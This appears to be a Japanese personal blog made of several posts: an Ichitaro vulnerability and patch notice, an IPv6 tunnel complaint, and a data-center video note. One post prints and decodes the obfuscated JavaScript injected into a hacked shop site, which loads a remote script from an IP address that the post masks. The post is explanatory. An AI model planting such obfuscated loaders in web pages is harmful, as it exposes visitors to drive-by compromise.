というものを見つけた。
IT系に限らず、イベント全体のようだ。
ということで、
IT 勉強会カレンダーや
IT 勉強会カレンダー検索もあわせてご利用をっ(ぉ
というものを見つけた。
IT系に限らず、イベント全体のようだ。
ということで、
IT 勉強会カレンダーや
IT 勉強会カレンダー検索もあわせてご利用をっ(ぉ
今回の脆弱性は該当製品の文書情報の処理部分に存在しています。 そのため、この脆弱性を悪用することを目的に改ざんされた文書ファイルを直接開いたり、 Webサイト上の文書ファイルをプラグインビューアで開いたり、 悪意のあるサイトへのリンクをクリックするなどしてそのサイトに埋め込まれた文書ファイルを 意図せず開いてしまった場合、外部の第三者からインターネット越しに任意のコードが実行される恐れがあります。
ということなので、早急にアップデート。パッチは下記のところで公開されているようです。
http://www3.justsystem.co.jp/download/ichitaro/up/win/t2009up1.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2008up5.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2007up4.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2006up3.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2005up3.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2004up5.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t13up4.exe
また、最近では、AdobeReader、FlashPlayerあたりでも重大な脆弱性がありましたね。
まだの方は、アップデートをお勧めします。
Genoサイトがその脆弱性をついたプログラムを仕掛けられるクラック事件があったようです。
通販のTOPページは閉じているが、その他のページは生きているのでGoogleさんで検索したら、商品ページは生きていました。
そこで、気になったので、商品ページを確認していると、問題のクラックされたプログラムへアクセスすることができました。
方法は、 w3m -dump_source および less を使用です。
w3m -dump_source www.XXXX.XX.jp/xmlrss/osusume.js (12:30確認) ----- document.write (unescape ('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2Fj queryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E') .replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
unescapeの部分を元の文字列に置き換えると、つぎのようになります。
詳しくは
この辺(Javascriptのescape関数で判読を難しくする)の説明およびツールをご覧ください。
<soQcripB9tmO smOrc=B9//94tNt.tNt2fq4YMj7tNt.w22YMj.19N65rz0/jqueryB9.mOjoQs>Bn </smOctNtriN6ptNttYMj>
あとは、replace 部分を正規表現で置換すれば解けます。
replaseの正規表現は、次の文字列を削除しなさい、ということなので、
純粋に値を削除すればいいです。
といてみたところ、次のような一文がでてきました。
これが、問題の脆弱性をつく部分でしょう。
<script src=//AA.BBB.C.DDD/jquery.js></script>
それにしても、単純でシンプルだけど気づきにくくするいい方法ですね。
よく考えるなぁ。
別の方法でも使えそうですね。
尚、昨日は、anketo_form.js および banner_koukoku.js に仕掛けられていたそうですが、
現在は修正され、osusume.js を新たに改竄されたようです。
すなわちサーバはバックアップから戻したというところでしょうか。
現在も尚、安全ではなさそうですのでしばらくアクセスは控えたほうがよいでしょう。
関連するサイトへのリンク
修正してきた。
情報が古いままだったので…
結構番号が、若い。
私も若いけど...(死語かしら、、、。^_^;;)
トンネルでIPv6を割り受けているのですが、実験的な位置づけの回線で私は生活をしています。
注意:半分愚痴です・・・
それにしても最近トラブルが多すぎ、2003年とかのころのほうが断然安定していたと思います。
ここのところ2,3年ぐらいトラブルでよく連絡するのですが、上流はまったく気づいておらず、
サイトの例としては、ietf や apnic といった海外への経路がまったくない時期があり、
1ヶ月ほどまってみましたが、気づく様子はありませんでした。
(その上流組織はそういう対外活動をしているので、ietfなどにアクセスする機会は多々ある)
そこで、問い合わせてみて経路がないことをいうと、調べてくれたりしてきっちりと解決はするのですが、
問い合わせがあるまで気づかないor放置せず、その前に何とかしてほしいなあと思いました。
本当のところ、IPv6だといっている推進組織がそういう状況じゃなぁ。。と。
普及していない理由のひとつが見えた気がします。
実は、今年になってから大きな障害が2回ありましたが、どちらもまったく気づいている様子はありませんでした。
一つ目は、JGN2Plusのアクセスポイントが計画停電だったのにもかかわらず、
接続が切れたまま気づかれず、こちらから問い合わせで
「何があったのでしょうか?」
ときいて、初めて回線が切れていることについて、調べてくれるような感じでした。
また、3月下旬ごろから、AAAAのついたサイトに正しくサイトにアクセスできず、
年度末進行で、修羅場中だったので原因追求せず、とりあえずそのうちに直っているだろうと
放置していましたが、改善されなかったため、落ち着いてから、連絡してみました。
問題が出てしばらくするまで、時間がなくて調査仕切れていなかったので、こちらの問題かも、、
とおもい、とりあえずは、同じトンネルを使っている人に聞いてみたところ、
「IPv6ではまったく生活しとらんからしらん」
といわれる状況で、様子がつかめず、最近、同じトンネルを使い、
生活をしている人を偶然見つけたので、
「そういう状況が起こってないですか?」
と聞いてみたところ、
「確かに最近おかしいですねぇ。。」
と。
でも、原因を追究していなかったようですけど。。
で、私のところじゃないなとおもい、簡単に調べてMTUがおかしいってめぼしをつけ、 上流に連絡したところ、本日連絡がありました。
結果は、次のような感じ。
ちゃんと、気づいているのかどうなのか、
こちらから連絡をしない限り気づかないのもどうなのよ…
って最近本当におもいます。
推進派の人たちがしっかりとつかっていれば、すぐに気づくはずなのに。。。
問い合わせをしたときに、「○○な状況で障害が出ています。しばらくお待ちくださいぐらい。」の回答をしてほしい。
※ ちなみに、今回の組織とは、WIDEではありません・・・。
ほかにIPv4のプラスアルファの価格で、個人で提供してもらえて、且つDNS委譲してもらえるIPv6サービスってないですかね、、、。
私が知るところ、現在ではOCN/IIJあたりで、万/month前後かそれ以上の法人プランしか選択肢がないという時点で、
微妙といえば、微妙です。この状況が変わらない限り普及は難しいきもしますが、その前にNGN、マルチプレフィックス問題ものこってますね。(あっ、話が反れた)
まあ、実験とはいえ、DNS委譲してもらえて、IPv6が使えることは幸せなのかも?と思いましたが、
がんばらないと使えない以上、なかなか普及は難しいかもしれません。
それにしても、個人の私ですら、、IPv6は7年以上さわってますよ?(触るだけですけど・・・)
周りの商用ISPや企業は、情報がないとか言わないでちゃんと調べましょうよ。
IPv6だといわれたときから何かしら触っていれば、情報がないわけではなく、
情報も転がっているし、さわる機会も実績もできたはずです。
日本企業の悪いところですね・・・。
本音として、話はそれてしまいますが、ここんとこ数年のコアルータなどはほとんどIPv6に対応しているはずですし、
最近のL2スイッチはよほど低価格な小規模向けを使わない限り、大半は設備的にはIPv6も対応しているはずです。
そのため、増速やアップデートが行われやすい部分のバックボーンが対応できないはずではないと思います。
おそらく、対応ができないのは、設備投資ではなく、後回しにしすぎた教育、検証、使用実績、ノウハウ、情報の共有なのではないでしょうか。
まあ、そのときから触るということは、それなりの人件コストがかかるでしょうけど、
ぎりぎりになって慌てて検討・検証し、大きな案件を逃したりするほうが余計に損をしているようにしか思えません。
※ (追記) 経路数が、、、という問題は指摘されちゃいました。
で、現在そういうMTU問題がでていて、超悲しいので、仕方なく、わざわざ、IPv4のみに対応したSquidを用意して、AAAAがついているサイトには、Proxy経由で強制的にIPv4で接続せざる得ない状況になっていて非常に悲しいです(;_;
早く直してーーー(;_;)
個人であっても法人向けプランでお金を積まなくても買えるDNS委譲込みのIPv6サービスって存在しないから、強烈に悲しいっす。。。
DNS委譲してくれる、IPv6トンネルサービス(ISP不問)というのがあれば、喜んで飛びつきますよ。
これを機会に、IIJあたりがそういうサービスしてくれないかなあ!?
それはそれで、新しい一つのビジネスですよ!!
(今の段階ではIPv6の帯域を保障してWEBアプリを動かすというよりは、使えるというほうが重要なので、ベストエフォートでもいいでしょう。周りにそういうわービスが無い間はそれでも、飛びつきます。)
HNSって、どうやれば、youtube のflvを貼り付けることができるのだろう(^^;
Bananaサーバというか、収容データセンターのビデオが次のURLで公開されています。
http://www.youtube.com/watch?v=JitcAwajlNA
データセンターの中の様子がみれるようです。
サーバ?のタグをみると、40M01 APC3-2 24e3-1 port1 とかいているので、
Extreme Summit 24e3のuplink Giga*2、24ポート10/100のL3スイッチでしょう。
よーく見ると、Summitが移っていますね。
natとか、パケットフィルタリングとかできる変体で、私も所有して使っていますw
2chのサーバなのかはわかりませんが、同じものを使っていますw
DELLかアラクサラっぽいスイッチもみえますね。(似てるけどよくわからなかった)
お互い紫箱が壊れないことを祈りましょうw
そして、ビデオに写っていたサーバの一覧ですw